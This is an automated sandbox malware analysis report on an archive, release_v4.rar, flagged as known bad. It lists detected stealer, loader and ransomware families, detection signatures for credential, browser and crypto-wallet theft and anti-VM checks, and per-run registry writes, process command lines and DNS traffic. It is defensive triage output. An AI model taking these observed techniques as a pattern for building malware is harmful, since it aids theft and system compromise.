Analysis Overview
SHA256
f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932
Threat Level: Known bad
The file release_v4.rar was found to be: Known bad.
Malicious Activity Summary
RisePro
Stealc
Detected Djvu ransomware
Lumma Stealer
Detect ZGRat V1
SmokeLoader
Glupteba
ZGRat
Glupteba payload
Djvu Ransomware
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Modifies Windows Firewall
Themida packer
Modifies file permissions
Reads data files stored by FTP clients
Loads dropped DLL
Checks computer location settings
Identifies Wine through registry keys
Drops startup file
Reads user/profile data of web browsers
Checks BIOS information in registry
UPX packed file
Executes dropped EXE
Drops Chrome extension
Looks up external IP address via web service
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Opens file in notepad (likely ransom note)
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 11:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
121s
Max time network
160s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3512 wrote to memory of 4888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3512 wrote to memory of 4888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3512 wrote to memory of 4888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4888 -ip 4888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240220-en
Max time kernel
123s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.spp | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.spp\ = "spp_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\spp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2964 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2964 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2964 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2744 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 8737992e24d01a9b4b32a9fd5169f358 |
| SHA1 | a07b2359d6515d22799cdfef79fb18d42d582d73 |
| SHA256 | 281edc696cf491ac36890de8537ef78e9bb0b366747759de6650e3a154e81b03 |
| SHA512 | 0e36a70d02b1bb6161e65865caff467d6673826b28f92c472eacb61b7813910c5d26de75adfb5d49f925d35e9904ee307294be881d2f3bb871fd5a98754e9a56 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
121s
Max time network
133s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2812 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2812 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2812 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2672 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 02fb92de41c824c3104f0d4c766faaf7 |
| SHA1 | 980d36729702c55463cf4dbf6bb6105990e84da9 |
| SHA256 | 41822af678abec3b61ea7e82b227757f12a5c7d584b86c43754014af87b38a4a |
| SHA512 | 2e1eb999d04a6d67a23fa088c2ce9a8f203b9dbe27984e73338a269dc7a77ceddbd7e7e0e3322da7c379278c0374148031e39d7dedeaaf42b40cd377007a1c22 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
136s
Max time network
157s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3220 wrote to memory of 4324 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3220 wrote to memory of 4324 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3220 wrote to memory of 4324 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
117s
Max time network
128s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1251.txt
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240220-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1258.txt
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
100s
Max time network
169s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
